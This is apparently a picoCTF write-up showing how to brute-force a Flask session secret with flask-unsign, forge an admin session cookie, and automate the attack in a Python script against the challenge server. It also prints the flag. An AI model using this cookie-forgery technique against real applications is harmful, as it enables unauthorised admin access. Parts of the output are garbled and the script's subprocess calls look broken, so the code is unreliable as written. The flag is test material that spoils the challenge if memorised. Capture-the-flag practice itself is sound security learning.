This problem requires you to change the payload in the JWT. Since we know all the possible secrets from the server.py file, we can brute force it using flask-unsign. After we get the cookie we can follow the commands below to unsign the cookie, insert the new payload which will grant us admin, and resubmit the new cookie.
$ pip install flask-unsign[wordlist]
$ flask-unsign --unsign --cookie eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.YGHZvg.hvmOT3C_J1RVk3yrj7zA9Dxo8lA --wordlist wordlist.txt
[*] Session decodes to: {'very_auth': 'blank'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 28 attemptscadamia
'wafer'
$ flask-unsign --sign --cookie "{'very_auth': 'admin'}" --secret wafer
eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YGHbOQ.4iogbBnCbe4C3zanPAtBnYj9CUgAlternatively you can use this script
# Import Libraries
from bs4 import BeautifulSoup
from subprocess import run
import requests
url = "http://mercury.picoctf.net:44693/"
# Get cookie
session = requests.Session()
response = session.get(url)
cookie = session.cookies.get_dict().get('session')
# Create wordlist
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
F = open('wordlist.txt', 'w')
for name in cookie_names:
F.write(name + "\n")
F.close()
# convert
secret = run(f"flask-unsign --unsign --cookie {cookie} --wordlist wordlist.txt").stdout
payload = "\"{'very_auth':'admin'}\""
sign = run(f"flask-unsign --sign --cookie {payload} --secret {secret}").stdout
# Send cookies to website
cookies = dict(session=sign[:-1])
response = requests.get(url, cookies=cookies)
soup = BeautifulSoup(response.text, "html.parser")
# Retreive flag from page
flag = soup.select("body > div.container > div.jumbotron > p:nth-child(2)")[0]
print(flag.get_text())picoCTF{pwn_4ll_th3_cook1E5_dbfe90bf}